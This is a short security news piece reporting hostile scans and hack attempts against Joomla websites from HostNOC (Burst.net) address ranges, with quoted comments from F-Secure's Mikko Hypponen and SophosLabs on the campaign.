“We are seeing increased criminal activity from HostNOC (aka Burst.net)” reports Stop Malvertising (With Love from HostNOC). “Recently suspicious scans from HostNOC ranges targeting Joomla components started filling up the server logs. Some of the hack attempts also tried to load remote scripts.”
“The first time I ran into HostNOC,” says Mikko Hypponen, “was back in 2007 when a DDoS attack against F-Secure.com was launched from their IP space. Now we regularly see badness from the same space: botnet C&C servers, DNS changers, ZeuS servers and so on. There's probably some good stuff in their network too – I just haven't found it.”
This current campaign “looks like attacks against websites running Joomla CMS,” explains Fraser Howard, a principle researcher at SophosLabs. “There have been a lot of user reports of these attacks in recent days.” The attacks are fairly typical: malicious HTTP requests against CMS applications. “From the looks of things,” he added, “they are targeting one of the default Joomla database tables containing user information.”
One of the potential abuses from gaining user credentials and enabling unauthorized access could be to add malicious redirects into affected websites; that is, to redirect visitors to exploit sites. However, correctly configured firewalls, should stop most of these malicious scans.